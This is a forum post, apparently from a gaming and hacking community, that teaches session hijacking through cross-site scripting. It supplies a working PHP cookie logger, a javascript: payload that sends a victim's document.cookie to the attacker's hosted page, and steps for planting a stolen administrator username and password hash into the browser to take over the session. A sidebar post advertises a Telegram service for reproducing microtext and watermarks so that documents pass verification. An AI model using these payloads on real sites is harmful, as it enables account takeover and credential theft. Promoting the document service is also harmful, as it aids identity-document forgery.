Jump to content

Recommended Posts

Posted

 

 

About

 

In this tutorial, I'll go through the processes of exploiting/manipulating cookies. A cookie, also known as browser cookie, is usually a small piece of data sent from a website and stored in a user's browser while a user is browsing a website. When the user visits the website after closing it, he will have session active because of the cookie retrieved information.

 

Session Hijacking

 

First of all, let's begin by explaining what session hijacking is. Basically, when a user registers at a website, he has his login credentials stored in a database. Upon successfully supplying and retrieval of that information, the user gets logged in. That particular attempt of logging and entering the account is creating a session. Sessions keep users logged throughout their whole browsing of the website.

 

Sessions have a name, value and a domain they are working on. Each session has a unique value which could not be traced normally for different users. However, we could use cross-site scripting (XSS) to grab the user's session ID and MD5 hash value.

 

For the sake of this tutorial, we will use the following:

 

Mozilla Firefox

Firebug (add-on)

Hosted PHP-based cookie stealer

 

Our goal is to steal the admin cookie which contains an active session. This could be done via cross-site scripting (XSS). So our vulnerability must be in the scope of the website we have as a target. We need to design a piece of code that would redirect the administrator upon clicking it to a page where our cookie stealer is located. Let's say we've found a vulnerable message system with a few input fields.

 

xekpz.jpg

 

What we aim to do now is send a small forged Javascript code that contains a false link. But what exactly is the cookie stealer?

 

Cookie Stealer

 

The cookie stealer plays the role of our cookie collector. Whenever our target visits the page with the cookie stealer, it will automatically log his cookies.

 


<?php

$container = $HTTP_GET_VARS['cookie'];
$file = fopen('logger.txt', 'a');
fwrite($file, $container . '\n\n');

?>

 

Upload it to your server (I use 000webhost) with the .php extension, of course. Either with an FTP client like FileZilla or the web-based one.

 

TP7e3.jpg

QCGU9.jpg

 

All that this small piece of code does is the following:

 

With the $container variable we collect/store the cookie itself. The $file variable creates a file that will store the cookie information. And the fwrite() function saves the cookie to the file. Now the \n is used to make a breakline. Practically, it bears the same function of <br /> tag in HTML.

 

Now all that is left is to forge the Javascript code that we are going to use to trick the admin to our cookie stealer.

 

javascript:void(window.location="www.[Censored].com/CookieLogger.php" + document.cookie)

 

The void() function in Javascript indicates that the link will open on the same page. The window.location serves the role of <a href=""> in HTML - Redirecting. And the document.cookie is the part where we grab the cookie from the user.

 

Ok, say we've got the cookie logged successfully. We now need to change our session value to the one we've got.

 

u3ika.jpg

 

strUsername=Administrator%40Account

strPassword=5b3de25c4dba50d2102281633d339b48

 

Now right click and Edit the cookie. That way we'll get the last active session of the administrator.

 

I2gXw.jpg

 

We will do the same thing with the password. But note that it's hashed in MD5.

 

Notice: Do NOT try cracking the hash and then place it's plaintext as a session value. It needs to be hashed in order to be parsed by the server.

 

UHRqz.jpg

 

You can also get to use the session within the URL bar. Delete the address and type:

 

javascript:void(document.cookie="strUsername=Administrator%40Account")

 

Then the same process for the password

 

javascript:void(document.cookie="strPassword=5b3de25c4dba50d2102281633d339b48")

 

That ends the tutorial. Hope you got something out of it. Thanks for reading!

 

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


  • Posts

    • MICROTEXT AND WATERMARKS BREAK MOST RENDERINGS Microtext and watermarks aren’t just small decorative details. They are one of the most common reasons a document fails verification, even when it looks decent at first glance. The issue is that these elements are almost impossible to reproduce “by eye.” Microtext requires precise geometry and legibility at a very small size, while a watermark needs the correct density, transparency, and accurate placement relative to other security features. Any deviation becomes obvious during detailed inspection. ▪ What’s most often done wrong: - microtext is drawn too thick or blurry - the watermark is made either too visible or almost invisible - the positioning between microtext and watermark is ignored - the original printing technology isn’t taken into account when choosing density and shape - The stronger the document’s security features, the less room there is for approximation. What matters here isn’t visual similarity, but accurate reproduction of the original technical characteristics. If your document contains microtext and watermarks, this is always an area that requires extra attention. Write to us in DMs. We’ll review your case and point out exactly which details need the highest precision during rendering. › TG: @mustang_service_ms ( https:// t.me/ mustang_service_ms ) › Channel: Mustang Service ( https:// t.me/ +JPpJCETg-xM1NjNl ) #drawing #microtext #photoshop #editing #watermarks
    • GoldRush launches tomorrow! July 18 16:00 GMT+3 Europe / International Register your account in the website, connect wallet and be ready to dominate!
    • 🏰 L2EXALTA LEGACY — Interlude x45 📅 Grand Opening: 31/07/2026 — 21:30 (GMT+3) 🌐 Website: https://l2exalta.org/ 💬 Discord: https://discord.gg/zNTCZD4AcT 📌 Wiki: https://l2exalta.org/en/wiki.html#progression   ⚙️ MAIN INFO Chronicle : Interlude Rates : x45 Adena : x50 Spoil : x1 Drop : x5 Safe Enchant : +3 Files : L2OFF   💰 ECONOMY EX Coin : dynamic market currency, mined from monsters, Raid Bosses and Grand Bosses value fluctuates over time Exalta Vouchers : premium currency used for store, donations and EX Coin exchange Exchange : convert EX Coin into Exalta Vouchers Investment options : choose safer or riskier market strategies with EX Coin   ⚔️ PROGRESSION & GEAR Exalta Armors : signature top-tier gear line Forge System : upgrade weapons, armor and jewels with risk/reward mechanics Raid Boss progression tied to materials and prestige   🤖 AUTOFARM Access : Auto Hunting button, bottom-right UI Duration : controlled via tickets or in-game currency Route Mode : record custom farm routes Support Mode : healer/support builds auto-follow, heal and assist party Smart targeting logic with class-specific behavior (mage/archer/melee/support) Captcha designed not to interrupt legitimate AutoFarm sessions   🧪 BUFFER Exalta Buffer NPC/interface Scheme Buffer : save multiple buff loadouts Class presets for mage, fighter, support, PvP   🛠️ SMART GADGETS / QOL Autoloot filter Drop value tracker Boss timer tools Farm stats tracker Auto-consume system In-game server assistant   🗺️ DUNGEON FINDER / PVE Party matching with roles (Tank / Healer / DPS) Ready-check before teleport Monastery of Silence custom PvE zone Party-based reward structure   🎟️ DAILY PROGRESS / EXALTA PASS Daily and weekly tasks (farm, PvP, boss, check-in) Premium Pass track with extra rewards Monastery Daily Quest Reward boards for claiming progress   🏠 HOUSING & EXPEDITIONS Player residences with service NPCs Exalta Spirit Expeditions to themed territories Rewards vary by territory Owner-only access   🏆 PVP / TOURNAMENT Scheduled Tournament system Ranking points from wins/participation Spectator Mode for watching live matches PvP Statues for top-ranked players Anti-feed protections   🛡️ CLAN CONTENT Clan Civil War battlefield event Clan Dungeon Raid content DPS Meter for contribution tracking Support Credit system Classic siege/clan politics preserved   🏪 AUCTION / SHOPS Auction House with seller fee Black Market Dealer (limited-time special offers) Custom shops and multisells Confirmation prompts on purchases/sales   💳 DONATIONS / VIP Donation rewards linked to Exalta Vouchers VIP tiers with comfort/cosmetic bonuses Premium store Gift/promo codes for events   🎥 STREAMER / COMMUNITY Streamer Panel with visible stream links Viewer rewards system Streamer Points for cosmetics/vouchers In-game voice chat (global/party/clan/alliance/command)   🔒 FAIR PLAY Strong Anti-Bot protection Reward protection tied to valid client state Captcha on suspicious activity Staff investigation tools No bots, packet tools or modified clients allowed   👑 GRANDBOSS SPAWNS Orfen : 1 day + 1h random Core : 1 day + 1h random Queen Ant : 1 day 6h + 1h random Zaken : 2 days 12h + 1h random Baium : 5 days + 1h random Antharas : 8 days + 1h random Valakas : 11 days + 1h random   🏅 OLYMPIAD Runs Thursday, Friday, Saturday Heroes change monthly Balanced and fair matchmaking
    • yup basically another one just in case https://drive.google.com/file/d/1UtccbD9e50x3WEnQBab2PTZnBHwpcGYM/view?usp=sharing LineageWarrior.FMagic (CollideActors = True; > False) LineageWarrior.FOrc (CollideActors = True; > False) LineageWarrior.FShaman (CollideActors = True; > False) LineageWarrior.MDarkElf (CollideActors = True; > False) LineageWarrior.MDwarf (CollideActors = True; > False) LineageWarrior.MElf (CollideActors = True; > False) LineageWarrior.MFighter (CollideActors = True; > False) LineageWarrior.MMagic (CollideActors = True; > False) LineageWarrior.MOrc (CollideActors = True; > False) LineageWarrior.MShaman (CollideActors = True; > False) LineageWarrior.FDwarf (CollideActors = True; > False) LineageWarrior.FElf (CollideActors = True; > False) LineageWarrior.FFighter (CollideActors = True; > False)
  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..